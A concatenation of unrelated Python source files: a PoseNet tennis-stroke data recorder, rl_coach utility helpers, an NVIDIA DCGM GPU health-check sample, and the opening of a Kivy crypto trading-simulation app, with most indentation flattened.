feed_dict={'image:0': input_image}
)
pose_scores, keypoint_scores, keypoint_coords = posenet.decode_multi.decode_multiple_poses(
heatmaps_result.squeeze(axis=0),
offsets_result.squeeze(axis=0),
displacement_fwd_result.squeeze(axis=0),
displacement_bwd_result.squeeze(axis=0),
output_stride=output_stride,
max_pose_detections=1,
min_pose_score=0.15)
keypoint_coords *= output_scale
# TODO this isn't particularly fast, use GL for drawing and display someday...
# print("\n ===================================== \n")
img = posenet.draw_skel_and_kp(
display_image, pose_scores, keypoint_scores, keypoint_coords,
min_pose_score=0.15, min_part_score=0.15)
cv2.imshow('posenet', img)
frame_count += 1
if recording:
normalized_coords = normalize_poses(keypoint_coords)  # compute once, reuse below
results = json.dumps({
"timestamp": time.time() - start,
"pose_scores": pose_scores.tolist(),
"keypoint_scores": keypoint_scores.tolist(),
"scores": keypoint_scores.size,
"keypoint_coords": normalized_coords,
"coords": keypoint_coords.size
})
file_content.append(results)
file_content = file_content[-30:]  # keep only the most recent 30 frames
cv2.waitKey(1)  # pump the OpenCV event loop once per frame to keep the window responsive
if keyboard.is_pressed('w'):
print('you pressed w - service it was!')
time.sleep(0.5)
path = "collected/serves/"
filename = str(slugify("s-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if keyboard.is_pressed('d'):
print('you pressed d - forehand it was!')
time.sleep(0.5)
path = "collected/forehand/"
filename = str(slugify("f-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if keyboard.is_pressed('a'):
print('you pressed a - backhand it was!')
time.sleep(0.5)
path = "collected/backhand/"
filename = str(slugify("b-"+str(time.time()))+".txt")
x = Thread(target=save_to_file, args=(str(path+filename),str(file_content)))
x.start()
x.join()
file_content = []
if keyboard.is_pressed('q'):
print('you pressed q - quitting!')
cv2.destroyAllWindows()
break
print('Average FPS: ', frame_count / (time.time() - start))
return 0
def my_function(toPrint):
print(toPrint)
def save_to_file(filename, data):
with open(filename, 'w') as f:
f.write(data)
def find_middle(left,right):
x = (left[0]+right[0])/2.0
y = (left[1]+right[1])/2.0
return [x,y]
def find_distance(pointA,pointB):
dist = math.sqrt((pointB[0] - pointA[0])**2 + (pointB[1] - pointA[1])**2)
return dist
def normalize_poses(poses):
# Express each keypoint relative to the hip midpoint, scaled by the
# shoulder-to-hip distance, so poses are comparable across camera distances.
leftShoulderCords = poses[0][5]
rightShoulderCords = poses[0][6]
middleShoulderPoint = find_middle(leftShoulderCords, rightShoulderCords)
leftHipCords = poses[0][11]
rightHipCords = poses[0][12]
middleHipPoint = find_middle(leftHipCords, rightHipCords)
armHipDistance = find_distance(middleHipPoint, middleShoulderPoint)
normalized = []
for pose in poses[0]:
normalized.append(
[(pose[0]-middleHipPoint[0])/armHipDistance,
(pose[1]-middleHipPoint[1])/armHipDistance]
)
return normalized
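# A quick sketch with made-up keypoints showing what normalize_poses
# computes: the hip midpoint maps to the origin and all coordinates are
# expressed in units of the shoulder-to-hip (torso) distance. The 17-slot
# layout matches PoseNet's keypoint ordering (5/6 = shoulders, 11/12 = hips).
def _demo_normalize_poses():
    fake_pose = np.zeros((1, 17, 2))
    fake_pose[0][5] = [0.0, 2.0]   # left shoulder
    fake_pose[0][6] = [2.0, 2.0]   # right shoulder
    fake_pose[0][11] = [0.0, 0.0]  # left hip
    fake_pose[0][12] = [2.0, 0.0]  # right hip
    normalized = normalize_poses(fake_pose)
    # Hip midpoint (1, 0) becomes (0, 0); torso length here is 2, so the
    # shoulders land at (-0.5, 1.0) and (0.5, 1.0).
    print(normalized[5], normalized[6])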
if __name__ == "__main__":
main() |
utils.py | #
# Copyright (c) 2017 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import importlib
import importlib.util
import inspect
import os
import re
import signal
import sys
import threading
import time
import traceback
from multiprocessing import Manager
from subprocess import Popen
from typing import List, Tuple, Union
import atexit
import numpy as np
from rl_coach.logger import screen
killed_processes = []
eps = np.finfo(np.float32).eps
def lower_under_to_upper(s):
s = s.replace('_', ' ')
s = s.title()
return s.replace(' ', '')
def get_base_dir():
return os.path.dirname(os.path.realpath(__file__))
def list_all_presets():
presets_path = os.path.join(get_base_dir(), 'presets')
return [f.split('.')[0] for f in os.listdir(presets_path) if f.endswith('.py') and f != '__init__.py']
def list_all_classes_in_module(module):
return [k for k, v in inspect.getmembers(module, inspect.isclass) if v.__module__ == module.__name__]
def parse_bool(value):
return {'true': True, 'false': False}.get(value.strip().lower(), value)
def convert_to_ascii(data):
import collections.abc
# Recursively walk mappings and iterables, parsing boolean-like strings.
if isinstance(data, str):
return parse_bool(data)
elif isinstance(data, collections.abc.Mapping):
return dict(map(convert_to_ascii, data.items()))
elif isinstance(data, collections.abc.Iterable):
return type(data)(map(convert_to_ascii, data))
else:
return data
def break_file_path(path):
base = os.path.splitext(os.path.basename(path))[0]
extension = os.path.splitext(os.path.basename(path))[1]
dir = os.path.dirname(path)
return dir, base, extension
def is_empty(value):
return value == 0 or len(value.replace("'", "").replace("\"", "")) == 0
def path_is_valid_dir(path):
return os.path.isdir(path)
def remove_suffix(name, suffix_start):
for s in suffix_start:
split = name.find(s)
if split != -1:
name = name[:split]
return name
def parse_int(value):
import ast
try:
int_value = int(value)
return int_value if int_value == value else value
except (TypeError, ValueError):
pass
try:
return ast.literal_eval(value)
except (ValueError, SyntaxError):
return value
def set_gpu(gpu_id):
os.environ['CUDA_VISIBLE_DEVICES'] = str(gpu_id)
def set_cpu():
set_gpu("")
# dictionary to class
class DictToClass(object):
def __init__(self, data):
for name, value in data.items():
setattr(self, name, self._wrap(value))
def _wrap(self, value):
if isinstance(value, (tuple, list, set, frozenset)):
return type(value)([self._wrap(v) for v in value])
else:
return DictToClass(value) if isinstance(value, dict) else value
# class to dictionary
def ClassToDict(x):
# return dict((key, getattr(x, key)) for key in dir(x) if key not in dir(x.__class__))
dictionary = x.__dict__
return {key: dictionary[key] for key in dictionary.keys() if not key.startswith('__')}
def cmd_line_run(result, run_cmd, id=-1):
p = Popen(run_cmd, shell=True, executable="/bin/bash")
while result[0] is None or result[0] == [None]:
if id in killed_processes:
p.kill()
result[0] = p.poll()
def threaded_cmd_line_run(run_cmd, id=-1):
runThread = None
result = [[None]]
try:
params = (result, run_cmd, id)
runThread = threading.Thread(name='runThread', target=cmd_line_run, args=params)
runThread.daemon = True
runThread.start()
except Exception:
if runThread is not None:
runThread.join()
return result
class Signal(object):
"""
Stores a stream of values and provides methods like get_mean and get_max
which returns the statistics about accumulated values.
"""
def __init__(self, name):
self.name = name
self.sample_count = 0
self.values = []
def reset(self):
self.sample_count = 0
self.values = []
def add_sample(self, sample):
"""
:param sample: either a single value or an array of values
"""
self.values.append(sample)
def _get_values(self):
if type(self.values[0]) == np.ndarray:
return np.concatenate(self.values)
else:
return self.values
def get_last_value(self):
if len(self.values) == 0:
return np.nan
else:
return self._get_values()[-1]
def get_mean(self):
if len(self.values) == 0:
return ''
return np.mean(self._get_values())
def get_max(self):
if len(self.values) == 0:
return ''
return np.max(self._get_values())
def get_min(self):
if len(self.values) == 0:
return ''
return np.min(self._get_values())
def get_stdev(self):
if len(self.values) == 0:
return ''
return np.std(self._get_values())
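# A brief usage sketch for Signal: accumulate scalar samples, query the
# running statistics, and reset between episodes.
def _demo_signal():
    reward = Signal('reward')
    for sample in [1.0, 2.0, 3.0]:
        reward.add_sample(sample)
    assert reward.get_mean() == 2.0 and reward.get_max() == 3.0
    reward.reset()
    assert reward.get_mean() == ''  # empty signals report ''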
def force_list(var):
if isinstance(var, list):
return var
else:
return [var]
def squeeze_list(var):
if len(var) == 1:
return var[0]
else:
return var
def get_open_port():
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("", 0))
s.listen(1)
port = s.getsockname()[1]
s.close()
return port
class timeout:
def __init__(self, seconds=1, error_message='Timeout'):
self.seconds = seconds
self.error_message = error_message
def _handle_timeout(self, signum, frame):
raise TimeoutError(self.error_message)
def __enter__(self):
signal.signal(signal.SIGALRM, self._handle_timeout)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
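# A usage sketch for the timeout context manager (Unix-only, since it is
# built on SIGALRM): abort a call that takes too long.
def _demo_timeout():
    try:
        with timeout(seconds=1, error_message='took too long'):
            time.sleep(10)  # interrupted after ~1 second
    except TimeoutError:
        pass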
def switch_axes_order(observation, from_type='channels_first', to_type='channels_last'):
"""
transpose an observation axes from channels_first to channels_last or vice versa
:param observation: a numpy array
:param from_type: can be 'channels_first' or 'channels_last'
:param to_type: can be 'channels_first' or 'channels_last'
:return: a new observation with the requested axes order
"""
if from_type == to_type or len(observation.shape) == 1:
return observation
assert 2 <= len(observation.shape) <= 3, 'num axes of an observation must be 2 for a vector or 3 for an image'
assert type(observation) == np.ndarray, 'observation must be a numpy array'
if len(observation.shape) == 3:
if from_type == 'channels_first' and to_type == 'channels_last':
return np.transpose(observation, (1, 2, 0))
elif from_type == 'channels_last' and to_type == 'channels_first':
return np.transpose(observation, (2, 0, 1))
else:
return np.transpose(observation, (1, 0))
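# Example for switch_axes_order with an illustrative frame shape: a
# channels_first RGB image becomes channels_last.
def _demo_switch_axes_order():
    frame = np.zeros((3, 84, 84))
    assert switch_axes_order(frame).shape == (84, 84, 3)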
def stack_observation(curr_stack, observation, stack_size):
"""
Adds a new observation to an existing stack of observations from previous time-steps.
:param curr_stack: The current observations stack.
:param observation: The new observation
:param stack_size: The required stack size
:return: The updated observation stack
"""
if curr_stack == []:
# starting an episode
curr_stack = np.vstack(np.expand_dims([observation] * stack_size, 0))
curr_stack = switch_axes_order(curr_stack, from_type='channels_first', to_type='channels_last')
else:
curr_stack = np.append(curr_stack, np.expand_dims(np.squeeze(observation), axis=-1), axis=-1)
curr_stack = np.delete(curr_stack, 0, -1)
return curr_stack
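# Usage sketch for stack_observation with illustrative 84x84 single-channel
# frames: an empty stack is seeded by repeating the first observation, and
# each later call rolls the oldest frame out.
def _demo_stack_observation():
    first = np.zeros((84, 84))
    stack = stack_observation([], first, stack_size=4)
    assert stack.shape == (84, 84, 4)
    stack = stack_observation(stack, np.ones((84, 84)), stack_size=4)
    assert stack.shape == (84, 84, 4)  # still 4 frames; oldest was dropped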
def call_method_for_all(instances: List, method: str, args=None, kwargs=None) -> List:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param method: the name of the function to be called
:param args: the positional parameters of the method
:param kwargs: the named parameters of the method
:return: a list of the return values for all the instances
"""
result = []
args = [] if args is None else (args if isinstance(args, list) else [args])
kwargs = {} if kwargs is None else kwargs
sub_methods = method.split('.') # we allow calling an internal method such as "as_level_manager.train"
for instance in instances:
sub_instance = instance
for sub_method in sub_methods:
if not hasattr(sub_instance, sub_method):
raise ValueError("The requested instance method {} does not exist for {}"
.format(sub_method, '.'.join([str(instance.__class__.__name__)] + sub_methods)))
sub_instance = getattr(sub_instance, sub_method)
result.append(sub_instance(*args, **kwargs))
return result
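# Usage sketch: invoke the same method on every instance in a group, here
# resetting a couple of the Signal objects defined above.
def _demo_call_method_for_all():
    call_method_for_all([Signal('a'), Signal('b')], 'reset')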
def set_member_values_for_all(instances: List, member: str, val) -> None:
"""
Calls the same function for all the class instances in the group
:param instances: a list of class instances to apply the method on
:param member: the name of the member to be changed
:param val: the new value to assign
:return: None
"""
for instance in instances:
if not hasattr(instance, member):
raise ValueError("The requested instance member does not exist")
setattr(instance, member, val)
def short_dynamic_import(module_path_and_attribute: str, ignore_module_case: bool=False):
"""
Import by "path:attribute"
:param module_path_and_attribute: a path to a python file (using dots to separate dirs), followed by a ":" and
an attribute name to import from the path
:return: the requested attribute
"""
if '/' in module_path_and_attribute:
"""
Imports a class from a module using the full path of the module. The path should be given as:
<full absolute module path with / including .py>:<class name to import>
And this will be the same as doing "from <full absolute module path> import <class name to import>"
"""
return dynamic_import_from_full_path(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
else:
"""
Imports a class from a module using the relative path of the module. The path should be given as:
<full absolute module path with . and not including .py>:<class name to import>
And this will be the same as doing "from <full relative module path> import <class name to import>"
"""
return dynamic_import(*module_path_and_attribute.split(':'),
ignore_module_case=ignore_module_case)
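# Usage sketch: both spellings resolve an attribute from a module, e.g.
# force_list from this very module (the file-path variant would assume the
# repository layout on disk).
def _demo_short_dynamic_import():
    fn = short_dynamic_import('rl_coach.utils:force_list')
    assert fn(3) == [3]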
def dynamic_import(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split(".")[-1]
available_modules = os.listdir(os.path.dirname(module_path.replace('.', '/')))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split(".")[:-1] + [curr_module_name])
module = importlib.import_module(module_path)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_from_full_path(module_path: str, class_name: str, ignore_module_case: bool=False):
if ignore_module_case:
module_name = module_path.split("/")[-1]
available_modules = os.listdir(os.path.dirname(module_path))
for module in available_modules:
curr_module_ext = module.split('.')[-1].lower()
curr_module_name = module.split('.')[0]
if curr_module_ext == "py" and curr_module_name.lower() == module_name.lower():
module_path = '.'.join(module_path.split("/")[:-1] + [curr_module_name])
spec = importlib.util.spec_from_file_location("module", module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
class_ref = getattr(module, class_name)
return class_ref
def dynamic_import_and_instantiate_module_from_params(module_parameters, path=None, positional_args=None,
extra_kwargs=None):
"""
A function dedicated to coach modules like memory, exploration policy, etc.
Given the module parameters, it imports the module and instantiates it.
:param module_parameters: a parameters object whose fields are matched against the constructor's arguments
:param path: an optional "path:attribute" string overriding module_parameters.path
:param positional_args: positional arguments for the constructor
:param extra_kwargs: extra named arguments for the constructor
:return: the instantiated module
"""
import inspect
positional_args = positional_args if positional_args is not None else []
extra_kwargs = extra_kwargs if extra_kwargs is not None else {}
if path is None:
path = module_parameters.path
module = short_dynamic_import(path)
args = set(inspect.getfullargspec(module).args).intersection(module_parameters.__dict__)
args = {k: module_parameters.__dict__[k] for k in args}
args = {**args, **extra_kwargs}
return module(*positional_args, **args)
def last_sample(state):
"""
given a batch of states, return the last sample of the batch with length 1
batch axis.
"""
return {
k: np.expand_dims(v[-1], 0)
for k, v in state.items()
}
def get_all_subclasses(cls):
if len(cls.__subclasses__()) == 0:
return []
ret = []
for drv in cls.__subclasses__():
ret.append(drv)
ret.extend(get_all_subclasses(drv))
return ret
class SharedMemoryScratchPad(object):
def __init__(self):
self.dict = {}
def add(self, key, value):
self.dict[key] = value
def get(self, key, timeout=30):
start_time = time.time()
timeout_passed = False
while key not in self.dict and not timeout_passed:
time.sleep(0.1)
timeout_passed = (time.time() - start_time) > timeout
if timeout_passed:
return None
return self.dict[key]
def internal_call(self, key, func, args: Tuple):
if type(args) != tuple:
args = (args,)
return getattr(self.dict[key], func)(*args)
class Timer(object):
def __init__(self, prefix):
self.prefix = prefix
def __enter__(self):
self.start = time.time()
def __exit__(self, type, value, traceback):
print(self.prefix, time.time() - self.start)
class ReaderWriterLock(object):
def __init__(self):
self.num_readers_lock = Manager().Lock()
self.writers_lock = Manager().Lock()
self.num_readers = 0
self.now_writing = False
def some_worker_is_reading(self):
return self.num_readers > 0
def some_worker_is_writing(self):
return self.now_writing is True
def lock_writing_and_reading(self):
self.writers_lock.acquire() # first things first - block all other writers
self.now_writing = True # block new readers who haven't started reading yet
while self.some_worker_is_reading(): # let existing readers finish their homework
time.sleep(0.05)
def release_writing_and_reading(self):
self.now_writing = False # release readers - guarantee no readers starvation
self.writers_lock.release() # release writers
def lock_writing(self):
while self.now_writing:
time.sleep(0.05)
self.num_readers_lock.acquire()
self.num_readers += 1
self.num_readers_lock.release()
def release_writing(self):
self.num_readers_lock.acquire()
self.num_readers -= 1
self.num_readers_lock.release()
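# Usage sketch for ReaderWriterLock (the method names are from the writers'
# point of view: lock_writing() registers a reader and blocks writers, while
# lock_writing_and_reading() takes exclusive write access). The shared dict
# below is an assumed stand-in for any structure guarded by the lock.
def _demo_reader_writer_lock(lock, shared_dict):
    lock.lock_writing()               # enter as a reader
    value = shared_dict.get('key')
    lock.release_writing()            # leave as a reader
    lock.lock_writing_and_reading()   # exclusive access for writing
    shared_dict['key'] = value
    lock.release_writing_and_reading()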
class ProgressBar(object):
def __init__(self, max_value):
self.start_time = time.time()
self.max_value = max_value
self.current_value = 0
def update(self, current_value, additional_info=""):
self.current_value = current_value
percentage = int((100 * current_value) / self.max_value)
sys.stdout.write("\rProgress: ({}/{}) Time: {} sec {}%|{}{}| {}"
.format(current_value, self.max_value,
round(time.time() - self.start_time, 2),
percentage, '#' * int(percentage / 10),
' ' * (10 - int(percentage / 10)),
additional_info))
sys.stdout.flush()
def close(self):
print("")
def start_shell_command_and_wait(command):
p = Popen(command, shell=True, preexec_fn=os.setsid)
def cleanup():
os.killpg(os.getpgid(p.pid), 15)
atexit.register(cleanup)
p.wait()
atexit.unregister(cleanup)
def indent_string(string):
return '\t' + string.replace('\n', '\n\t')
|
dcgm_health_check.py | # Copyright (c) 2021, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
sys.path.insert(0, '../')
import dcgm_structs
import dcgm_fields
import dcgm_agent
import dcgmvalue
from threading import Thread
from time import sleep
## Look at __name__ == "__main__" for entry point to the script
class RunDCGM():
def __init__(self, ip, opMode):
self.ip = ip
self.opMode = opMode
def __enter__(self):
dcgm_structs._dcgmInit()
self.handle = dcgm_agent.dcgmInit()
return self.handle
def __exit__(self, eType, value, traceback):
dcgm_agent.dcgmShutdown()
## Helper method to convert enum to system name
def helper_convert_system_enum_to_system_name(system):
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PCIE):
return "PCIe"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_NVLINK):
return "NvLink"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_PMU):
return "PMU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MCU):
return "MCU"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_MEM):
return "MEM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_SM):
return "SM"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_INFOROM):
return "Inforom"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_THERMAL):
return "Thermal"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_POWER):
return "Power"
if system & (1 << dcgm_structs.DCGM_HEALTH_WATCH_DRIVER):
return "Driver"
## Helper method to convert a health return value to a string for display purposes
def convert_overall_health_to_string(health):
if health == dcgm_structs.DCGM_HEALTH_RESULT_PASS:
return "Pass"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_WARN:
return "Warn"
elif health == dcgm_structs.DCGM_HEALTH_RESULT_FAIL:
return "Fail"
else:
return "N/A"
## Worker function
def agent_worker_function(dcgmHandle, groupId):
NUM_ITERATIONS = 5
count = 0
## Add the health watches
newSystems = dcgm_structs.DCGM_HEALTH_WATCH_ALL
dcgm_agent.dcgmHealthSet(dcgmHandle, groupId, newSystems)
while True:
dcgm_agent.dcgmUpdateAllFields(dcgmHandle, 1)
try:
## Invoke Health checks
group_health = dcgm_agent.dcgmHealthCheck(dcgmHandle, groupId)
print "Overall Health for the group: %s" % convert_overall_health_to_string(group_health.overallHealth)
for index in range (0, group_health.gpuCount):
print "GPU ID : %d" % group_health.gpu[index].gpuId
for incident in range (0, group_health.gpu[index].incidentCount):
print "system tested : %d" % group_health.gpu[index].systems[incident].system
print "system health : %s" % convert_overall_health_to_string(group_health.gpu[index].systems[incident].health)
print "system health err : %s" % group_health.gpu[index].systems[incident].errorString
print "\n"
except dcgm_structs.DCGMError as e:
errorCode = e.value
print("dcgmHealthCheck returned error: %d" % errorCode)
count = count + 1
if count == NUM_ITERATIONS:
break
sleep(2)
## Main
def main():
## Initialize the DCGM engine in manual operation mode. This implies that its execution is
## controlled by the monitoring agent. The user has to periodically call APIs such as
## dcgmEnginePolicyTrigger and dcgmEngineUpdateAllFields which tells DCGM to wake up and
## perform data collection and operations needed for policy management.
with RunDCGM('127.0.0.1', dcgm_structs.DCGM_OPERATION_MODE_MANUAL) as handle:
## Create a default group. (Default group is comprised of all the GPUs on the node)
## Let's call the group "all_gpus_group". The method returns an opaque handle (groupId) to
## identify the newly created group.
groupId = dcgm_agent.dcgmGroupCreate(handle, dcgm_structs.DCGM_GROUP_DEFAULT, "all_gpus_group")
## Invoke method to get information on the newly created group
groupInfo = dcgm_agent.dcgmGroupGetInfo(handle, groupId)
## Create reference to DCGM status handler which can be used to get the statuses for multiple
## operations on one or more devices present in the group
status_handle = dcgm_agent.dcgmStatusCreate()
## The worker function can be executed as a separate thread or as part of the main thread.
## Executed as a separate thread here
thread = Thread(target = agent_worker_function, args = (handle, groupId))
thread.start()
##########################################
# Any other useful work can be placed here
##########################################
thread.join()
print "Worker thread completed"
## Destroy the group
try:
dcgm_agent.dcgmGroupDestroy(handle, groupId)
except dcgm_structs.DCGMError as e:
print >>sys.stderr, "Failed to remove the test group, error: %s" % e
sys.exit(1)
## Destroy the status handle
try:
dcgm_agent.dcgmStatusDestroy(status_handle)
except dcgm_structs.DCGMError as e:
print >>sys.stderr, "Failed to remove status handler, error: %s" % e
sys.exit(1)
if __name__ == '__main__':
main()
|
main.py | from kivy.app import App
from kivy.uix.button import Button
from kivy.uix.label import Label
from kivy.uix.popup import Popup
from kivy.uix.dropdown import DropDown
from kivy.uix.boxlayout import BoxLayout
from kivy.graphics import Color, Rectangle
from kivy.utils import get_color_from_hex
from kivy.storage.jsonstore import JsonStore
from assets.utils.PriceFetcher import Fetcher
from assets.utils.NewsFetcher import NewsFetcher
from threading import Thread
from time import sleep
import webbrowser
from assets.utils import Pulser
# from kivy.config import Config
# Config.set('graphics', 'width', '412')
# Config.set('graphics', 'height', '915')
class MainApp(App):
"""
_DEF_EX = exchange (for now hard coded to 'Binance')
_DEF_SYM = symbol (for now default is 'btcusdt')
_DARK_MODE_RGB = RGB for dark mode
_LIGHT_MODE_RGB = RGB for light mode
_DEF_DISP_MODE = default display mode
_DEFAULT_NEWS_MODE = default status for displaying news
_DEF_CUM_PNL = default cumulative pnl
_DEFAULT_FEES = default user fees
_PNL_PERC = decimal precision for pnl display
_DEF_DATAJSON_NAME = json filename for user settings
current_position - current position being held (1 for long, -1 for short, 0 for none)
entry_price - entry price for current position
last_price
zero_pnl - macro string used to reset PnL
cumulative_pnl - PnL of all positions
current_pnl - PnL of current position being held
position_mapping - convert from int to str representation of position type
display_mode_mapping - convert from integer to str representation of display mode
_GIT_URL - the developer's GITHUB url
about_info - the text to be displayed in the about window
"""
_DARK_MODE_RGB = (0, 0, 0)
_TEXT_COLOR_DARKMODE = get_color_from_hex("#ffffff")
_LIGHT_MODE_RGB = (227 / 255, 214 / 255, 177 / 255)
_TEXT_COLOR_LIGHTMODE = get_color_from_hex("#000000")
_DEF_EX = "Binance"
_DEF_SYM = "BTCUSDT"
_DEF_DISP_MODE = 0
_DEFAULT_NEWS_MODE = True
_DEF_CUM_PNL = 0.0
_DEFAULT_FEES = 0.0
_PNL_PERC = 2
_DEF_DATAJSON_NAME = "user_data"
_GREEN_HEX = "#00b82b"
_RED_HEX = "#b80000"
price_fetcher = Fetcher(_DEF_EX)
current_position = int()
entry_price = float()
last_price = float()
zero_pnl = "0.00%"
current_pnl = 0.0
position_mapping = {
1: 'Long',
0: 'Neutral',
-1: 'Short'
}
display_mode_mapping = {
0: 'Dark Mode',
1: 'Light Mode'
}
_GIT_URL = "https://github.com/adanikel"
about_info = f'This is an open source game designed to ' \
f'simulate real-life trading by fetching a live price feed ' \
f'from top crypto exchanges (currently only Binance is supported).' \
f'\n\n\n' \
f'Made by [ref={_GIT_URL}][color=0000ff]adanikel[/color][/ref]'
def build(self):
"""
main_layout (used as class attr)
symbol_label - see current symbol
price_label - live price feed
pnl_label - live PnL of current position
entry_price_status_layout
pos_str_label - string representation of current position
entry_price_label - entry price of current position
news_label - news flash
options_layout - to add padding to the button
button_refresh - a refresh button for the cumulative PnL
button_settings - a button to open settings menu
popup_settings - a popup window for settings
symbols_list - dropdown list for symbols
button_display_mode - toggle view mode (dark or light)
button_news - turn on / off newsflash
button_fees - popup page to fees
fees_label - display fees
fees_up_button - increment fees
fees_down_button - decrement fees
button_about - display about
cum_pnl_label
position_buttons_layout
button_buy
button_sell
"""
self.store = JsonStore(f'{self._DEF_DATAJSON_NAME}.json')
self.load_user_data()
self.main_layout = BoxLayout(orientation="vertical")
self.main_layout.add_widget(Pulser.bg_pulser)
with self.main_layout.canvas:
Rectangle(source="icons/lightning.png", size=(1450, 1450), pos=(0, 550))
self.symbol_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=100,
pos_hint={'center_x': .5, 'center_y': 1},
color=(237 / 255, 142 / 255, 43 / 255, 0.4))
self.main_layout.add_widget(self.symbol_label) # add price label
self.price_label = Label(text='0.0',
bold=True,
size_hint=(.8, .8),
font_size=250,
pos_hint={'center_x': .5, 'center_y': .9})
self.main_layout.add_widget(self.price_label) # add price label
self.pnl_label = Label(text=self.zero_pnl,
bold=True,
size_hint=(.5, .5),
font_size=100,
pos_hint={'center_x': .5, 'center_y': .9})
self.main_layout.add_widget(self.pnl_label) # add price label
entry_price_status_layout = BoxLayout(orientation='horizontal')
self.pos_str_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=60,
pos_hint={'center_x': .5, 'center_y': .9})
entry_price_status_layout.add_widget(self.pos_str_label) # add price label
self.entry_price_label = Label(text='0.00',
italic=True,
size_hint=(.5, .5),
font_size=60,
pos_hint={'center_x': .5, 'center_y': .9})
entry_price_status_layout.add_widget(self.entry_price_label) # add price label
self.main_layout.add_widget(entry_price_status_layout)
self.news_label = Label(text='',
size_hint=(.5, .5),
font_size=60,
pos=(0, 0))
self.main_layout.add_widget(self.news_label)
options_layout = BoxLayout(orientation="horizontal",
# padding=[200, 100, 100, 100],
pos_hint={'center_x': 0.6, 'center_y': 0.5},
spacing=100)
self.button_settings = Button(text='',
size_hint=(None, None),
size=(170, 170),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_settings.bind(on_press=self.on_press_settings)
options_layout.add_widget(self.button_settings)
self.button_refresh = Button(text='',
size_hint=(None, None),
size=(170, 170),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_refresh.bind(on_press=self.on_press_refresh)
options_layout.add_widget(self.button_refresh)
self.cum_pnl_label = Label(text='',
bold=True,
size_hint=(.5, .5),
font_size=140,
pos_hint={'center_x': .5, 'center_y': .5})
options_layout.add_widget(self.cum_pnl_label)
self.main_layout.add_widget(options_layout)
position_buttons_layout = BoxLayout(orientation="horizontal",
size_hint=(1, 0.5))
button_buy = Button(text='Buy',
bold=True,
size_hint=(.8, .8),
pos_hint={'center_x': .5, 'center_y': .8},
background_color=get_color_from_hex("#3de03a"))
button_buy.bind(on_press=self.on_press_buy)
position_buttons_layout.add_widget(button_buy)
button_sell = Button(text='Sell',
bold=True,
size_hint=(.8, .8),
pos_hint={'center_x': .5, 'center_y': .8},
background_color=get_color_from_hex("#eb3838"))
button_sell.bind(on_press=self.on_press_sell)
position_buttons_layout.add_widget(button_sell)
self.main_layout.add_widget(position_buttons_layout)
self.start_ticker(self.current_symbol)
self.popup_settings = Popup(title='Settings',
size_hint=(0.5, 0.5),
background='icons/secondary_background.png',
background_color=[1, 1, 1, .5],
on_dismiss=self.save_user_data)
self.settings_buttons = BoxLayout(orientation="vertical", padding=[0, 0, 0, 700]) # in pc, use 100
self.symbols_dropdown = DropDown(max_height=650)
for symbol in self.price_fetcher.get_all_symbols():
symbol_button = Button(text=symbol.upper(), size_hint_y=None, height=125)
symbol_button.bind(on_release=lambda symbol_button: self.symbols_dropdown.select(symbol_button.text))
self.symbols_dropdown.add_widget(symbol_button)
self.main_symbol_button = Button(text=self.current_symbol.upper(),
pos_hint={'center_x': .5, 'center_y': .8})
self.main_symbol_button.bind(on_release=self.symbols_dropdown.open)
self.symbols_dropdown.bind(on_select=self.change_ticker)
self.settings_buttons.add_widget(self.main_symbol_button)
self.button_display_mode = Button(text='',
pos_hint={'center_x': .5, 'center_y': .5})
self.button_display_mode.bind(on_press=self.set_display_mode)
self.settings_buttons.add_widget(self.button_display_mode)
self.about_label = Label(text=self.about_info,
markup=True,
on_ref_press=self.on_ref_press,
pos_hint={'center_x': .5, 'center_y': 1})
self.about_label.bind(size=lambda s, w: s.setter('text_size')(s, w)) # to limit text into popup
self.about_window = Popup(title='About',
size_hint=(0.5, 0.5),
background_color=[1, 1, 1, .5],
content=self.about_label)
self.news_fetcher = NewsFetcher()
self.button_news = Button(text=self.generate_news_button_text(),
pos_hint={'center_x': .5, 'center_y': .5})
self.button_news.bind(on_press=self.on_press_news)
self.settings_buttons.add_widget(self.button_news)
if self.news_status:
self.start_news_flasher()
